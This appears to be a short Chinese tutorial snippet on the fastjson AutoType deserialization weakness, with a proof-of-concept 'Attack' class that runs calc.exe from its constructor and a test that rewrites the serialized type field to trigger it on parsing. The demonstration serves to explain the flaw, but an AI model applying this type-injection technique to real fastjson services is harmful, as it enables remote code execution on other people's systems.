背景
fastJson在1.2.25版本之前的AutoType
是默认开启的,在1.2.25版本之后就是默认关闭的。
而作怪的就是这个AutoType
恶意类
public class Attack {
public Attack() {
try {
//打开本地计算器
String commands = "calc.exe";
Process pc = Runtime.getRuntime().exec(commands);
pc.waitFor();
}catch (Exception e){
e.printStackTrace();
}
}
}
测试类
public class Main {
public static void main(String[] args) {
Map<String,String> parent = new HashMap<>();
parent.put("name","123");
String parentStr = JSON.toJSONString(parent, SerializerFeature.WriteClassName);
System.out.println("json序列化后:===>"+parentStr);
//模拟劫持
parentStr = hijacked(parentStr);
System.out.println("json被劫持后:===>"+parentStr);
System.out.println("反序列化成功:"+JSON.parseObject(parentStr));;
}
//模拟修改序列化的type
private static String hijacked(String json) {
String[] split = json.split(",");
split[0] = split[0].substring(0,split[0].indexOf(":")+2) + "com.mytest.tt.Attack\"";
StringBuilder sb = new StringBuilder();
for (String s : split) {
sb.append(s);
sb.append(",");
}
return sb.substring(0,sb.length()-1);
}
}